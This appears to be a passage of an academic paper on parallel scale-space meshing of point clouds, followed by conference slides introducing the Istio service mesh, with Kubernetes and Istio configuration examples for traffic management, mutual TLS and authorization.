positions. Sets 1 and 2 are alternatively the result of the previous and current scale-space iterations. The octree always stores the index of the current set and updates it after each iteration. Spatial queries are only slightly modified by this: the same octree is traversed using the same method, with the only difference that the lists with the current index are considered at each iteration, while the others are ignored. In practice, when applying the mean curvature motion to either the initial point set or to the result of an even number of iterations, the result of the projection will be stored in Set 1. The result of an odd number of projection iterations will be stored in Set 2. This way the initial and final sets will always be available. In addition, each point keeps track of the point of \( P_0 \) it originated from (Algorithm 2, lines 3 and 10). For completeness, we summarize the method in Algorithm 2. In practice, the implementation uses a little trick to be faster. Instead of getting the neighbors of each point \textit{from scratch}, it uses the fact that when looking for neighbors, one needs to get the cell containing the point at a given depth [3]. Yet for all points of a given cell this parent cell is the same. The process is then to traverse the octree in a depth-first manner: when a cell \( A \) at the right depth is reached, the cell is stored and the traversal continues, until a leaf descending from \( A \) is reached. Thus the points in this leaf will be processed faster, since there is no need to look for the right ancestor node for each point. This is why there are overloaded \textit{applyScaleSpace} functions in the code. We refer the reader to [3] for a precise explanation of the neighbor search functions. 
In the end one has the original point set, the result of the scale-space iteration and a correspondence between the points of both point sets, which allows for the \textit{back-projection} of the mesh obtained at a coarse scale to obtain the final fine scale mesh. Algorithm 2: scale_space(\(\mathcal{P}, N, r\)): applying the scale-space iterations to a point set \(\mathcal{P}\) **Input:** A point set \(\mathcal{P}\), a number of iterations \(N\) and a radius \(r\) **Output:** A modified point set \(\mathcal{P}_N\) 1. Sort and store \(\mathcal{P}\) in \(\mathcal{P}_0\) endowed with an octree structure; 2. for \(p \in \mathcal{P}_0\) do 3. Set \(p\).origin \(\leftarrow p\); 4. \(idx \leftarrow 0\); 5. for \(i = 0, \ldots, N - 1\) do 6. \(new_idx \leftarrow \text{mod}(idx, 2) + 1\); 7. for \(p \in \mathcal{P}_{idx}\) do 8. \(p' \leftarrow \text{MCM}(p, \mathcal{P}_{idx}, r)\); 9. Store \(p'\) in \(\mathcal{P}_{new_idx}\); 10. \(p'.origin \leftarrow p.origin\); 11. if \(idx > 0\) then 12. Erase \(\mathcal{P}_{idx}\) 13. \(idx \leftarrow new_idx\); Contrary to other existing scale-space structures (e.g. [11]), this scale-space does not iteratively subsample the shape: the same number of points is preserved throughout the scale-space iterations. It is a geometric multi-resolution scheme, where the initial shape becomes increasingly smooth but the data size does not change. In practice however, some points might be lost if their neighborhoods do not contain enough points for estimating a regression plane, but this loss is minimal (less than 0.1% of the points in general). The result of the scale-space iterations is a denoised point set representing a smooth surface. This is precisely the kind of data that is very easily meshed by an interpolating method, such as the Ball Pivoting Algorithm [1]. The next section explains how to use this scale-space for meshing an input point set. 3 Using the Scale-Space for Surface Reconstruction The scale-space meshing algorithm is summarized in Figure 1. It consists of three steps: - **Scale-space iterations.** The scale-space is iterated on the point set as described in Section 2. - **Meshing step.** A triangular mesh is built out of the smoothed point set resulting from the scale-space iterations. - **Back-projection.** The resulting mesh is back-projected onto the original point set, creating an interpolating mesh. The scale-space iteration step consists in applying Algorithm 2 to the set of points and does not require any further explanation. Notice that if the number of scale-space iterations is 0, then the scale-space meshing reduces to the traditional Ball Pivoting Algorithm. The next subsections detail the meshing and back projecting steps. 3.1 Input Data The input data of the algorithm is a set of oriented points, an unorganized set of points consistently oriented. In other words, all normals should point either inwards or outwards. These normals are required by the Ball Pivoting Algorithm to ensure that the resulting surface mesh is orientable. It is important to notice that the scale-space iterations themselves do not require this knowledge: the MCM can be applied to points without normals since computing the regression plane does not use this information. 3.2 Meshing Step The only constraint on the meshing method is that it should interpolate the points and not create any additional vertex. We chose to use the Ball Pivoting Algorithm [1], whose implementation is described thoroughly in [3]. 
We use this implementation to reconstruct an interpolating surface from the smoothed positions. In a nutshell, the Ball Pivoting Algorithm incrementally builds a manifold mesh from an input point set by adding a triangle to the mesh if there is an empty-interior ball of fixed radius \( r \) passing through three data points. The ball is then pivoted around each of the triangle's edges until another point is met. The process being incremental, it allows for a fast parallelization. The resulting triangulated surface is a manifold mesh possibly with holes and multiple connected components. The mesh is efficiently constructed on the smoothed point set and is therefore not interpolating the original point set, which is why a back-projection is performed next. At the end of the Ball Pivoting Algorithm, similarly to [3], we apply an additional step to fill triangular holes that may remain. We refer the reader to [3] for details about this step. 3.3 Back-projection Back-projecting the resulting mesh on the original point set is simple since every point of the last point set keeps track of the point it originated from (see lines 3 and 10 of Algorithm 2). Therefore we simply have to transfer the connectivity from a point to its origin. The back-projection is summed up in Algorithm 3. In the proposed implementation it is done directly when saving the mesh. Algorithm 3: \textit{back\_project}(\( M_N \)): back projecting the final mesh Input: A surface mesh \( M_N \) of the last smoothed point set \( P_N \) Output: A surface mesh \( M_0 \) of the initial point set \( P_0 \) 1. for each triangle \( t \in M_N \) do 2. Let \( v_0, v_1, v_2 \) be the vertices of \( t \); 3. Create a triangle \( t' \) with vertices \( v_0.\text{origin}, v_1.\text{origin}, v_2.\text{origin} \); 4. Add \( t' \) to \( M_0 \); The result of this back-projection is an interpolating mesh of the original point set. Yet, the back-projection process does not guarantee that the final mesh will be self-intersection free. By construction, the coarse scale mesh cannot self-intersect. Yet, moving each point to its original position might cause self-intersections of the mesh. For a reasonable radius and number of iterations, this phenomenon was not observed or at least not in a way that would hinder the visualization. The output of the algorithm is a set of vertices linked by triangular facets stored in the Stanford PLY format. In this format each facet is given by the three indices of its vertices. The indices are given in a clockwise order relatively to the oriented normal of the facet. This is done in this implementation in the `saveOrientedFacet` function (class FileIO). 4 Parallelization Since the scale-space meshing algorithm consists of very local computations, it parallelizes nicely provided some precautions are taken. The octree data structure is used to sort cells into sets, each set containing cells that can be processed independently as shown in Figure 2. This parallelization is done for both the scale-space iterations and the meshing step. For the scale-space iterations, each thread processes a different cell (see Algorithm 4). Processing a cell consists in applying the scale-space to all the points in the cell and storing them in the corresponding set. 
The only precaution to take is to check that the projected points obtained in two different threads will not be stored in the same set of the same cell, since that would cause conflicts between the threads. Since the projection of a point $p$ lies inside a ball with radius $r$ centered at $p$, it is enough to ensure that for two cells processed simultaneously, their dilatations of radius $r$ do not contain a common leaf cell. The processing depth is therefore set as the minimum depth such that the size of the cell is above $d = 2.1r$, and at least 1 (Algorithm 4, lines 1-2). This is easily done by computing $$\text{level} = \max(\text{octree.depth} - \lfloor \log_2 \frac{\text{octree.size}}{d}\rfloor, 1), \quad (1)$$ where $\text{octree.size}$ is the length of the largest side of the bounding box. The only remaining possible conflict happens when two threads simultaneously try to add a point in a branch not yet created. Though this case is rare, it is handled by preventing the simultaneous creation of branches (critical section in method `addPoint` of class Octree). The Ball Pivoting Algorithm is parallelized similarly and we refer the reader to [3] for more details. Computation times for the whole Scale-Space Meshing algorithm with and without parallelization are given in Table 1 for a computation on a 4-core laptop ($4 \times 2.9$GHz). Figure 2: Parallelization principle in 2D. Cells that can be processed simultaneously are depicted in the same color. Table 1: Computation time with and without parallelization for a 4-core laptop (4 × 2.9GHz). The number of iterations was set to 4 for all these point sets. <table> <thead> <tr> <th>Point set</th> <th>Number of Points</th> <th>Radius</th> <th>Computation Time (single-threaded)</th> </tr> </thead> <tbody> <tr> <td>Bunny</td> <td>360K</td> <td>0.0005</td> <td>21s</td> </tr> <tr> <td>Dragon</td> <td>1.5M</td> <td>0.0005</td> <td>328s</td> </tr> <tr> <td>Pyramid</td> <td>1M</td> <td>0.4</td> <td>515s</td> </tr> </tbody> </table> Algorithm 4: Parallelization of Scale-Space iterations. **Input**: An oriented input point cloud \( P \) sorted into an octree \( O \) with given depth, a radius \( r \). **Output**: A denoised point set stored in the octree \( O \). 1. \( d \leftarrow 2.1 \cdot r \); 2. \( l \leftarrow \max(1, \text{smallest level at which cells have size larger than } d) \) (cf Equation 1); 3. for \( i = 0, \ldots, 7 \) do 4. \( \text{cells} \leftarrow \text{cells of the octree at level } l \text{ and with child index } i; \) 5. for \( C \in \text{cells} \) do in parallel 6. for each point \( p \) in \( C \) do 7. \( p' \leftarrow MCM(p, P, r); \) 8. \( C' \leftarrow \text{octree cell containing } p'; \) 9. Store \( p' \) in the point list of \( C' \) corresponding to the next index; 5 Parameters Choice There are three parameters for the scale-space and one parameter for the Ball Pivoting Algorithm. Yet those parameters can be set by choosing two values: a radius \( r \) and a number of iterations \( N \). Below, we explain how all the parameters of the scale-space and ball pivoting can be deduced from these two values. - **Scale-space parameters.** Three parameters are required by Algorithm 2: the radius of the projection filter, the standard deviation \( \sigma \) for the Gaussian weight (denoted \( \gamma \) in Algorithm 1), and the number of iterations. The scale-space radius is set to \( 2r \), the standard deviation is set to \( \sigma = 2r \) and the number of iterations is equal to \( N \). 
- **Ball Pivoting algorithm parameters.** The Ball Pivoting Algorithm needs a single parameter, the radius of the pivoting ball, which is taken equal to \( r \). One could choose unrelated radii for the projection filter and the ball radius but this setting is particularly well suited for the experiments. It is nevertheless very important that the radius of the projection filter is larger than the radius of the ball pivoting in order for the regression plane to be stable. The number of iterations is by default set to 4. If the shape is very noisy, one may set a higher number of iterations, but the details and sharp features are always contained in the first iterations, so that few iterations are necessary. A coarse heuristic for setting \( r \) consists in considering the number of points \( N_{\text{points}} \) and the size of the bounding box \( l \), and deducing the radius: \( r = \sqrt{20/N_{\text{points}}} \cdot l \). Indeed, if the shape were a perfect sphere (enclosed in the same bounding box), its surface area would be \( 4\pi(l/2)^2 = \pi l^2 \), thus the number of points per unit surface would be \( \frac{N_{\text{points}}}{\pi l^2} \). The area of the surface in a neighborhood of radius \( r \) is approximated to \( \pi r^2 \) (given \( r << l \)), therefore to obtain around 20 neighbors, one should set \( r \) such that \( \pi r^2 \cdot \frac{N_{\text{points}}}{\pi l^2} = 20 \), hence the formula. For instance, a cloud of \( N_{\text{points}} = 10^6 \) points gives \( r \approx 0.0045\, l \). The next section reviews some technical details of the provided code including dependencies. 6 Code The dependencies and properties of this implementation are the same as for the Ball Pivoting Algorithm [3], and we copy the same paragraphs below for completeness. As a matter of fact, if the number of iterations is set to 0, the algorithm is exactly equivalent to the Ball Pivoting Algorithm with a single radius. 6.1 Dependencies The code provided is a stand-alone C++ code, available at http://dx.doi.org/10.5201/ipol.2015.102. It uses the C++ standard template library extensively. The user can choose between the single-threaded implementation and its parallel version. The single-threaded version does not rely on any external libraries. The parallelization is done through OpenMP\(^2\), a standard API for shared memory multiprocessing programming. (\(^2\)The OpenMP API specification for parallel programming, http://openmp.org.) The code was tested successfully on Ubuntu 14.04 with g++4.8, and on MacOS 10.8 using g++4.8.0. The compilation is done through the CMake build system to be cross-platform. The code compiles with g++ and with clang, but there is no support yet for OpenMP with the clang compiler, so that the parallelism is deactivated in that case. 6.2 Integration in a Larger Project The code is templated and the structures are kept as simple as possible to allow better integration into different C++ projects. In particular, it should be easy to interface it with the CGAL library [7] and thus benefit from CGAL geometry kernels. Nevertheless, the goal here is to have a stand-alone code, avoiding the need to link against such a heavy library as CGAL. 6.3 Numerical Robustness The current implementation relies heavily on geometric tests (e.g. to know whether a point lies within a sphere given by a point and a radius, to know if a point lies on the right side of a potential triangle...). These problems are known to generate numerical robustness problems potentially dramatic for global structures such as Delaunay triangulations. A solution to that problem is to use exact arithmetic, which is very time-consuming. An alternative is to use robust arithmetic through robust predicates (i.e. 
predicates that will give consistent results) as described in [12]. Yet in our case the consequences of not using any robust predicates are not so dramatic since the construction of the mesh is incremental and local. A numerical instability will only affect the choice of a particular triangle instead of another but will not create global artifacts. 7 Experiments The first example (Figure 3) is precisely the one that was presented as a failure case for the Ball Pivoting Algorithm (BPA) [3]. The goal is indeed to interpolate a noisy point cloud, and in that case neither the single-radius BPA nor the multiple-radius version succeeds in recovering a closed interpolating mesh. In comparison, the Scale-Space Meshing Algorithm recovers a closed mesh interpolating exactly the input noisy point set, allowing for a visual quality assessment of the shape reconstruction. Figure 4 shows the result of the Scale-Space Meshing Algorithm on some well-known shapes from the Stanford repository, showing that the method works in standard cases. Figure 3: A noisy sphere reconstructed by the Ball Pivoting Algorithm (BPA) and Scale-Space Meshing Algorithm (SSM). Only the Scale-Space Meshing (right) allows for the reconstruction of a closed interpolating mesh (30000 vertices, 60000 facets). Figure 4: Results of the Scale-Space Meshing algorithm on some standard shapes: the Stanford Bunny (left, \( r = 0.0005, N = 4 \)) and the Stanford Dragon (right, \( r = 0.0005, N = 4 \)). One can also judge the interpolating quality of the mesh by comparing the number of vertices to the number of input points. For the pyramid point set (Figure 6), for example, the Scale-Space Meshing Algorithm builds a mesh with 99.24% of the input point set as vertices compared to only 79.36% for the Ball Pivoting Algorithm. Figures 3 and 5 provide comparisons of the Scale-Space Meshing and the Ball Pivoting Algorithms with the exact same meshing radius. In particular, Figure 5 shows that the details are much better preserved with the Scale-Space Meshing Algorithm. Figure 6 shows the shape evolution of a pyramid point set [4] with respect to the scale. The shape loses its details and becomes smoother: as a consequence, computations done at the low scale will be more robust than those done at the highest scales. The result of the processing thus strongly depends on the choice of the scale. Finally, we show the performance of the Scale-Space Meshing using various input shapes from the Farman dataset [4]. Figure 7 shows the coarse and fine scale meshes built from cropped point clouds from the Farman dataset [4]. 8 Conclusion This paper presented the parallel implementation of the scale-space meshing algorithm, a method to build an interpolating mesh for point sets containing possibly details and sharp features as well as noise. The code for this implementation is available for download and online tests (http://dx.doi.org/10.5201/ipol.2015.102). Acknowledgments This work was partially funded by Direction Générale de l’Armement, Office of Naval Research (Grant N00014-97-1-0839) and the European Research Council (ERC Advanced Grant “Twelve Labours”). Data Credits The Stanford Bunny and Stanford Dragon (Figure 4) are from the Stanford 3D Scanning Repository\textsuperscript{3}. The other shapes (Figures 5, 6 and 7) are from the Farman Institute 3D Point Sets\textsuperscript{4}. 
\textsuperscript{3}http://graphics.stanford.edu/data/3Dscanrep/
\textsuperscript{4}http://www.ipol.im/pub/art/2011/dalmm_ps/

Figure 6: Evolution of a shape with the scale space.

Figure 7: The coarse and fine scale meshes produced by the Scale-Space Meshing Algorithm applied to datasets from the Farman dataset. The parameters used are: $r = 0.2$ (Girl with Crotales), $r = 0.16$ (Brassempouy), $r = 0.2$ (logo), $r = 0.1$ (Anubis). In all the experiments, $N = 4$. NB: these point sets are not subsampled or normalized like the ones proposed in the demo.
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-01238790/file/article.pdf", "len_cl100k_base": 7634, "olmocr-version": "0.1.48", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 36583, "total-output-tokens": 9713, "length": "2e12", "weborganizer": {"__label__adult": 0.00039887428283691406, "__label__art_design": 0.001617431640625, "__label__crime_law": 0.0004472732543945313, "__label__education_jobs": 0.0011577606201171875, "__label__entertainment": 0.00012946128845214844, "__label__fashion_beauty": 0.0002887248992919922, "__label__finance_business": 0.0003142356872558594, "__label__food_dining": 0.0004453659057617187, "__label__games": 0.0009002685546875, "__label__hardware": 0.0021419525146484375, "__label__health": 0.0008840560913085938, "__label__history": 0.0010128021240234375, "__label__home_hobbies": 0.0002777576446533203, "__label__industrial": 0.0010347366333007812, "__label__literature": 0.0003871917724609375, "__label__politics": 0.00036025047302246094, "__label__religion": 0.0007967948913574219, "__label__science_tech": 0.4794921875, "__label__social_life": 0.00013947486877441406, "__label__software": 0.01342010498046875, "__label__software_dev": 0.49267578125, "__label__sports_fitness": 0.0003910064697265625, "__label__transportation": 0.0008497238159179688, "__label__travel": 0.0003349781036376953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35282, 0.03411]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35282, 0.5908]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35282, 0.84858]], "google_gemma-3-12b-it_contains_pii": [[0, 978, false], [978, 3340, null], [3340, 7161, null], [7161, 10339, null], [10339, 14521, null], [14521, 17244, null], [17244, 19811, null], [19811, 22781, null], [22781, 26006, null], [26006, 29003, null], [29003, 30631, null], [30631, 31951, null], [31951, 33489, null], [33489, 33862, null], [33862, 35282, null]], "google_gemma-3-12b-it_is_public_document": [[0, 978, true], [978, 3340, null], [3340, 7161, null], [7161, 10339, null], [10339, 14521, null], [14521, 17244, null], [17244, 19811, null], [19811, 22781, null], [22781, 26006, null], [26006, 29003, null], [29003, 30631, null], [30631, 31951, null], [31951, 33489, null], [33489, 33862, null], [33862, 35282, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35282, null]], "pdf_page_numbers": [[0, 978, 1], [978, 3340, 2], [3340, 7161, 3], [7161, 10339, 4], [10339, 14521, 5], [14521, 17244, 6], [17244, 19811, 7], [19811, 22781, 8], [22781, 26006, 9], [26006, 29003, 10], [29003, 30631, 11], [30631, 31951, 12], [31951, 
33489, 13], [33489, 33862, 14], [33862, 35282, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35282, 0.02643]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
bd599fc54c8114b0017711922a2aa5aff16b6758
Service Mesh from the Ground Up: How Istio Can Transform Your Organization

Megan O'Keefe
oreilly.com/sacon | #OReillySACon

Hello! ☁️ I'm a Developer Relations Engineer at Google Cloud. 💕 I help make Google's products easy to adopt and use. 💻 I test-drive new features, build demos/tools/workshops, and talk to end-users. ☸️ I work on: Kubernetes, Service Mesh, and Anthos.

Today's Goals
- The world of distributed applications
- Why use a service mesh?
- Istio feature tour
- Live demos!
- Q&A

Why Service Mesh?

The increasing adoption of containers, microservices, and hybrid cloud deployments has created more distributed applications than ever. Distributed apps can be defined as a collection of services.

What is a Service?

A **Service** is one deployable unit of software. A Service implements a specific set of **business logic**, and is often owned by one team. A Service can run and **scale** independently from its dependencies. A Service can be **small** or **large**. A Service can be **stateless** or **stateful**.

Services: Benefits
- Separation of concerns
- Abstract away infrastructure
- Faster deployments
- Scale independently
- Cost savings

How do your **developers** and **operators** keep things up and running with explosive growth in the number of services? By thinking **services first**: investing in **automation**, **tools**, and **cultural change**. This is not easy.

Services: Challenges
- More languages, client libraries
- Choosing an environment
- Lifecycling Applications
- Scaling to demand
- Resource optimization

What can Kubernetes do?
- Multitenancy, Isolation
- Abstract away compute
- Keep containers alive
- Automated scaling
- Optimize resources

Kubernetes runs **Pods (Workloads)** in a **Cluster**. A **Cluster** = a set of Virtual Machines (**Nodes**).

(Diagram: a Cluster consists of a master and several nodes; you talk to the master, which schedules Pods onto the nodes.)

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: hello-world
spec:
  replicas: 1
  selector:
    matchLabels:
      app: hello-world
  template:
    metadata:
      labels:
        app: hello-world
    spec:
      containers:
      - name: hello-world-server
        image: gcr.io/megangcp/helloworld:v0.0.1
        ports:
        - containerPort: 8080
```

```yaml
apiVersion: v1
kind: Service
metadata:
  name: helloworld
spec:
  selector:
    app: hello-world
  ports:
  - name: http
    protocol: TCP
    port: 80
    targetPort: 8080
  type: LoadBalancer
```

```bash
kubectl apply -f deployment.yaml
deployment.extensions/hello-world created
```

```bash
kubectl get pods
```

<table>
<thead>
<tr> <th>NAME</th> <th>READY</th> <th>STATUS</th> <th>RESTARTS</th> </tr>
</thead>
<tbody>
<tr> <td>hello-world-84c646556b-kn59b</td> <td>1/1</td> <td>Running</td> <td>0</td> </tr>
</tbody>
</table>

```bash
kubectl get svc
```

<table>
<thead>
<tr> <th>NAME</th> <th>TYPE</th> <th>CLUSTER-IP</th> <th>EXTERNAL-IP</th> </tr>
</thead>
<tbody>
<tr> <td>helloworld</td> <td>LoadBalancer</td> <td>10.51.246.3</td> <td>35.188.110.209</td> </tr>
</tbody>
</table>

```bash
➜ curl http://35.188.110.209
Hello world!
```

But... Where does Kubernetes fall short?
- Safe Rollouts
- Observability
- Traffic Encryption
- Request-level Authorization
- Resilience

What is a Service Mesh?

A **transparent layer** on top of your services. A way to make the **network** aware of application protocols like HTTP and gRPC. An **observability** tool. A **security** tool.

Why use a Service Mesh?
- Decouple Dev from Ops
- Separate applications from infrastructure
- Get generated metrics without instrumenting your services
- Manage security policies in one place
- Modify traffic flow without changing app code

What is Istio?
Istio An open-source service mesh tool to manage service interactions across container and VM-based services. Created by Google, IBM, and Lyft in 2017 Runs on Kubernetes Works at the application layer (Layer 7: HTTP, gRPC) Today: 300+ organizations contributing Istio Connect, secure, control, and observe services. Connect Intelligently control the flow of traffic and API calls between services, conduct a range of tests, and upgrade gradually with red/black deployments. Secure Automatically secure your services through managed authentication, authorization, and encryption of communication between services. Control Apply policies and ensure that they're enforced, and that resources are fairly distributed among consumers. Observe See what's happening with rich automatic tracing, monitoring, and logging of all your services. What Does Istio Do? - Observability - Network Automation - Security What Does Istio Do? - Telemetry for every service - Logs for all traffic - Service graph What Does Istio Do? - Telemetry for every service - Logs for all traffic - Service graph - Safe rollouts with traffic splitting - Client-side load balancing - Timeouts, retry, circuit-breaking What Does Istio Do? - Telemetry for every service - Logs for all traffic - Service graph - Safe rollouts with traffic splitting - Client-side load balancing - Timeouts, retry, circuit-breaking - Encryption in transit - Service identity, authentication - Authorization Who is Istio for? **Infrastructure Operators:** Monitor traffic across clusters and regions, add failover **Platform Engineers:** Build CI/CD tools for app developers, migrate legacy services **App Developers:** Investigate service metrics and behavior, debug during outages **Security Admins:** Enforce authentication and authorization policies **Quality Assurance:** Mirror production traffic to a test environment Istio Partners IBM Cloud Solo AspenMesh Envoy Knative Cisco Datadog WeaveWorks Palo Alto Networks more at: istio.io/about/community/partners/ | image source: Datadog Istio a Game Changer for HP's FitStation Platform How HP is building its next-generation footwear personalization platform on Istio BY STEVEN CEUPPENS, CHIEF SOFTWARE ARCHITECT @ HP FITSTATION, OPEN SOURCE ADVOCATE & CONTRIBUTOR | JULY 31, 2018 | 2 MINUTE READ This blog post was written assuming Istio 1, so some of this content may now be outdated. The FitStation team at HP strongly believes in the future of Kubernetes, BPF and service-mesh as the next standards in cloud infrastructure. We are also very happy to see Istio coming to its official Istio 1.0 release – thanks to the joint collaboration that started at Google, IBM and Lyft beginning in May 2017. more at: istio.io/about/community/customers/ Case Study: Autotrader Adopting Kubernetes led to a 75 percent reduction in compute resources. Adopting Istio led to improved security and visibility, with no extra developer effort or training needed. Istio's service metrics improved visibility across a large microservices architecture. 
source: Google Cloud Blog

How Istio Works

(Architecture diagram, repeated across several slide builds: Service A and Service B each run alongside a proxy sidecar, with an agent per node; the Istio control plane comprises Pilot, Galley, Citadel, Mixer, and the sidecar injector. Labeled flows: mesh config (YAML) to the control plane; discovery & config data to the proxies; sidecar configuration to Pods; TLS certs to node agents and to proxies via Secrets; policy checks and telemetry to Mixer.)

Installing Istio
Demo
Questions?

Observability

Observability is a measure of how well internal states of a system can be inferred from knowledge of its external outputs.

Istio Observability Features
- **Service graph** - track dependencies at **runtime**
- Bird's eye view of service behavior for issue triage, reduce time to **detect and fix outages**
- Automatically collects the "golden signals" for every service - **latency, error rate, throughput**
- Set, monitor and enforce **Service-Level Objectives (SLOs)**
- **Tracing:** track a request from end to end, across service boundaries

Demo

Security

Moving from VMs to Kubernetes introduces new security challenges.
<table> <thead> <tr> <th>Virtual Machines</th> <th>Kubernetes</th> </tr> </thead> <tbody> <tr> <td>Isolation at the <strong>host level</strong></td> <td>Containers <strong>share</strong> a host (Node)</td> </tr> <tr> <td>Workloads allocated to hosts</td> <td>Nodes work as <strong>one</strong> virtual host</td> </tr> <tr> <td>Workloads <strong>share</strong> OS, dependencies</td> <td>Containers have <strong>own dependencies</strong></td> </tr> <tr> <td><strong>Stable</strong> host IPs</td> <td><strong>Ephemeral</strong> Pod IPs</td> </tr> <tr> <td>May run in a <strong>trusted</strong>, on-prem environment</td> <td>May run in a <strong>cloud</strong> environment</td> </tr> </tbody> </table> Istio - Security Automatically secure your services through managed authentication, authorization, and encryption of communication between services. - Traffic encryption - Service auth - Auditing controls - Access policies Demo: Mutual TLS Node - Agent - Service A - Proxy Node - Agent - Service B - Proxy Node - Pilot - Galley - Citadel - Mixer YAML - Mesh config to control plane - Sidecar configuration to Pods - Discovery & config data to proxies - TLS certs - TLS certs to node agents - Policy checks and telemetry MeshPolicy apiVersion: "authentication.istio.io/v1alpha1" kind: "MeshPolicy" metadata: name: "default" spec: peers: - mtls: {}/ DestinationRule apiVersion: "networking.istio.io/v1alpha3" kind: "DestinationRule" metadata: name: "default" namespace: "istio-system" spec: host: "*.local" trafficPolicy: tls: mode: ISTIO_MUTUAL Demo: Authorization Node Agent Service A Proxy Service B Proxy Node Agent TLS certs to proxies via Secrets Pilot Galley Citadel Mesh config to control plane TLS certs to node agents YAML Pilot Galley Citadel Inject Sidecar configuration to Pods Istio Control Plane Discovery & config data to proxies Policy checks and telemetry TLS certs to node agents Mesh config to control plane Sidecar configuration to Pods YAML AuthorizationPolicy apiVersion: "security.istio.io/v1beta1" kind: "AuthorizationPolicy" metadata: name: "currency-policy" namespace: default spec: selector: matchLabels: app: currency-service rules: - from: - source: principals: ["cluster.local/ns/default/sa/frontend-sa"] Questions? DevOps DevOps is an organizational and cultural movement that aims to increase software delivery *velocity*, improve service *reliability*, and build *shared ownership* among software stakeholders. [cloud.google.com/devops](http://cloud.google.com/devops) What is DevOps? - design - plan - release - deploy - build - test - monitor - operate DEV OPS Google Cloud DevOps is an organizational and cultural movement that aims to increase software delivery velocity, improve service reliability, and build shared ownership among software stakeholders. cloud.google.com/devops DevOps with **Istio** **Velocity:** safe rollouts with traffic *splitting*. deprecate legacy services with *redirects*. accelerate the customer feedback loop with *A/B testing*. **Reliability:** set SLOs and alerts on generated metrics. use *circuit breaking* and *fault injection* to harden services. **Shared ownership:** declarative traffic/security policies in a *shared Git repo*. scope Istio policies at the *namespace* level. 
Istio - Traffic Management

VirtualService, Gateway, DestinationRule, and ServiceEntry
- Traffic splitting
- Traffic steering
- Circuit breaking
- Egress control
- Fault injection

VirtualService

```yaml
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: frontend
spec:
  hosts:
  - "frontend.default.svc.cluster.local"
  http:
  - route:
    - destination:
        host: frontend
```

Gateway

```yaml
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
  name: frontend-gateway
spec:
  selector:
    istio: ingressgateway
  servers:
  - port:
      number: 80
      name: http
      protocol: HTTP
    hosts:
    - "*"
```

DestinationRule

```yaml
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
  name: frontend
spec:
  host: frontend.default.svc.cluster.local
  subsets:
  - name: v1
    labels:
      version: v1
  - name: v2
    labels:
      version: v2
```

(Diagram sequence: a Kubernetes Deployment whose Pods sit behind a Kubernetes Service; then two Deployments, v1 and v2, behind the same Service; a DestinationRule groups the v1 and v2 Pods into subsets, and a VirtualService routes traffic through the Service to those subsets.)

Demo: Service Redirect

Service Redirect
Scenario - we've moved to a faster payments service, coolcash. We want to deprecate paymentservice and redirect calls to coolcash.

Demo: Canary Deployment

Canary Deployment
- Release new service versions without worrying about ops challenges
- Goal: progressively direct traffic to the new frontend v2
(Diagram: a load generator sends traffic to frontend v1 (80%) and frontend v2 (20%).)

Demo: A/B Testing

A/B Testing
**Goal:** Determine which frontend layout results in the most revenue.
Requests with the `ab-selected:true` HTTP header are routed to v2.

Combining Traffic Rules

```yaml
http:
- match: # RULE 1 - ADD HEADER
  - uri:
      prefix: "/article/breaking-news"
  route:
  - destination:
      host: articles
  headers:
    response:
      add:
        no-cache: "true"
  timeout: 2s
- match: # RULE 2 - URI REWRITE
  - uri:
      prefix: /blog
  rewrite:
    uri: /beta/blog
  route:
  - destination:
      host: articles
  timeout: 2s
- route: # RULE 3 - DEFAULT / TIMEOUT
  - destination:
      host: articles
    weight: 100
  timeout: 2s
```

Resilience

What makes an application resilient? Downstream services **fail gracefully** when an upstream service is unavailable. **Timeouts** and **retry** logic to prevent a service waiting forever for an upstream. **Failover policies** to another region running the same service.

Istio Resilience Features
⏰ Timeouts and retry logic
⚡ Circuit breaking
🚧 Fault injection
🚫 Client-side load balancing
🌍 Locality load balancing / Regional failover

Demo: Circuit Breaking

Circuit Breaking
(State diagram: Closed stays closed while failures are under the threshold; too many failures open the circuit, which then fails fast; after a timeout it moves to Half Open, returning to Closed on success or back to Open on failure. Image source: Banzai Cloud.)

Circuit Breaking
Avoid cascading failures through multiple services.
Istio circuit breaker:
1. detect $x$ consecutive failures
2. trip the circuit breaker
3. **fail immediately** for $t$ seconds

Demo: Fault Injection

Fault Injection
Chaos testing - detect how downstream services respond when upstream services fail. Find weak spots in application code error handling. Istio supports error and timeout faults.

Wrap-Up

Where does Kubernetes fall short?
- Safe Rollouts
- Observability
- Traffic Encryption
- Request-level Authorization
- Resilience

How can **Istio** transform your organization?
